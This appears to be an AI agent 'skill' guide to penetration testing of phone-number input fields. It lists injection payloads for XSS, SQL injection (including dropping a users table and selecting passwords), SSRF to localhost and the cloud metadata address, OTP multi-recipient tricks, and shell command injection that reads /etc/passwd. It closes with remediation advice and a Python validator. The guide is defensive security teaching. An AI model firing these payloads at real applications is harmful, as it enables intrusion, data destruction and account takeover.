Hacktricks-skills phone-number-injection-testing

Test phone number input fields for injection vulnerabilities including XSS, SQLi, SSRF, and OTP bypass attacks. Use this skill whenever you need to assess web application security, test form inputs, audit phone number fields, or investigate potential injection points in user-submitted data. Don't skip this when reviewing any form that accepts phone numbers - these fields are commonly overlooked attack vectors.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/pentesting-web/phone-number-injections/SKILL.MD
source content

Phone Number Injection Testing

Phone number input fields are frequently overlooked attack vectors. This skill guides you through testing for injection vulnerabilities that occur when applications don't properly sanitize phone number inputs.

What This Skill Covers

  • XSS via phone numbers: Injecting JavaScript through phone number fields
  • SQLi via phone numbers: SQL injection through phone number parameters
  • SSRF via phone numbers: Server-side request forgery through phone number fields
  • OTP bypass: Exploiting phone number fields to bypass or brute-force OTP systems
  • Format manipulation: Appending strings to phone numbers to probe for command injection in backend processing

When to Use This Skill

Use this skill when:

  • You're auditing a web application with phone number input fields
  • You're testing registration, login, or contact forms
  • You're investigating potential injection vulnerabilities
  • You're performing security assessments on user input handling
  • You need to document phone number field security issues

Testing Methodology

1. Identify Phone Number Fields

Locate all phone number input fields in the application:

  • Registration forms
  • Login/verification forms
  • Contact forms
  • Profile settings
  • Checkout/payment forms
  • API endpoints accepting phone numbers

2. Test for XSS

Phone number fields often lack proper sanitization. Test with:

+1234567890"><script>alert(1)</script>
+1234567890"><img src=x onerror=alert(1)>
+1234567890"><svg onload=alert(1)>

What to look for:

  • Script execution in the browser
  • Reflected XSS in error messages
  • Stored XSS if the number is saved and displayed later

3. Test for SQL Injection

Phone numbers are often used in database queries. Test with:

+1234567890' OR '1'='1
+1234567890" OR "1"="1
+1234567890'; DROP TABLE users--
+1234567890' UNION SELECT username,password FROM users--

What to look for:

  • SQL error messages
  • Different behavior (login success, different results)
  • Time-based delays (for blind SQLi)

4. Test for SSRF

If phone numbers trigger backend processing (SMS, validation), test with:

+1234567890@127.0.0.1
+1234567890@localhost
+1234567890@169.254.169.254 (AWS metadata)

What to look for:

  • Internal network access
  • Metadata endpoint access
  • Different error messages indicating backend processing

5. Test for OTP Bypass

Phone number fields used for OTP delivery may accept more than one recipient if list separators are not rejected. Test with:

+1234567890,+19999999999 (multiple numbers)
+1234567890&+19999999999 (concatenation)
+1234567890;+19999999999 (semicolon)
+1234567890|+19999999999 (pipe)

What to look for:

  • Multiple OTPs sent
  • OTP sent to attacker-controlled number
  • OTP bypass (no OTP required)

6. Test Format Manipulation

Append shell metacharacters and command substitutions to the phone number to check whether the backend passes it to a shell or another command interpreter:

+1234567890;ls
+1234567890|cat /etc/passwd
+1234567890`whoami`
+1234567890$(whoami)

What to look for:

  • Command execution
  • File access
  • Information disclosure

Common Vulnerabilities

1. Lack of Input Validation

Applications often fail to validate phone number formats, allowing injection payloads to pass through.

2. Improper Sanitization

Even when validation exists, sanitization may be incomplete, leaving injection vectors open.

3. Backend Processing

Phone numbers may be processed by backend systems (SMS gateways, validation services) that don't expect malicious input.

4. Database Queries

Phone numbers are often used in database queries without proper parameterization.

Reporting Findings

When documenting phone number injection vulnerabilities:

  1. Describe the vulnerability: What type of injection was found
  2. Provide proof of concept: Show the payload and its effect
  3. Explain the impact: What an attacker could do
  4. Recommend remediation: How to fix the issue

Remediation Recommendations

1. Input Validation

  • Validate phone number format using regex
  • Allow only digits, +, -, (, ), and spaces
  • Reject any other characters

2. Parameterized Queries

  • Use parameterized queries for all database operations
  • Never concatenate user input into SQL queries

3. Output Encoding

  • Encode all output to prevent XSS
  • Use context-aware encoding (HTML, JavaScript, URL, etc.)

4. Backend Sanitization

  • Sanitize phone numbers before passing to backend systems
  • Validate format at every layer

5. Rate Limiting

  • Implement rate limiting for OTP requests
  • Monitor for abuse patterns
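As an added example (not part of the upstream skill), the following Python code implements remediation points 1, 2 and 4: it accepts only the characters listed above, normalizes the number to a canonical +digits form before it reaches the database or an SMS gateway, and looks it up with a parameterized sqlite3 query. The 7-digit lower bound, the users table and the sample row are assumptions made for the example; the rejected inputs are the payloads from the testing sections above.

```python
import re
import sqlite3
from typing import Optional

# Character set the remediation above allows: digits, +, -, (, ), and spaces.
ALLOWED_RE = re.compile(r"^[0-9+\-() ]+$")
# Canonical form checked after formatting characters are stripped: optional
# leading +, then 7 to 15 digits (E.164 allows at most 15; 7 is an assumption).
NORMALIZED_RE = re.compile(r"^\+?[0-9]{7,15}$")


def normalize_phone(raw: str) -> Optional[str]:
    """Return a canonical +digits form, or None if the input is not a phone number."""
    if not ALLOWED_RE.fullmatch(raw):
        return None  # quotes, <, >, @, ',', ';', '|', '`', '$' never get this far
    digits = re.sub(r"[-() ]", "", raw)  # strip formatting characters only
    if not NORMALIZED_RE.fullmatch(digits):
        return None  # catches e.g. a second '+' or a too-long digit string
    return digits


def lookup_user(conn: sqlite3.Connection, raw: str) -> Optional[str]:
    """Look up a user by phone number without concatenating input into SQL."""
    phone = normalize_phone(raw)
    if phone is None:
        return None  # validation failed at this layer; nothing reaches the DB
    # Parameterized query: the value is bound by the driver, never interpolated.
    row = conn.execute(
        "SELECT username FROM users WHERE phone = ?", (phone,)
    ).fetchone()
    return row[0] if row else None


def demo_db() -> sqlite3.Connection:
    """Constructed in-memory users table with one sample row (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, phone TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', '+1234567890')")
    return conn


if __name__ == "__main__":
    db = demo_db()
    for candidate in ["+1 (234) 567-890", "+1234567890' OR '1'='1",
                      "+1234567890,+19999999999", "+1234567890;ls"]:
        print(repr(candidate), "->", lookup_user(db, candidate))
```

The same normalized value should be what is handed to the SMS gateway, so an OTP can only ever be sent to a single validated recipient.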

Tools and Resources

  • Burp Suite: For intercepting and modifying requests
  • OWASP ZAP: For automated scanning
  • SQLMap: For SQL injection testing
  • XSStrike: For XSS testing

References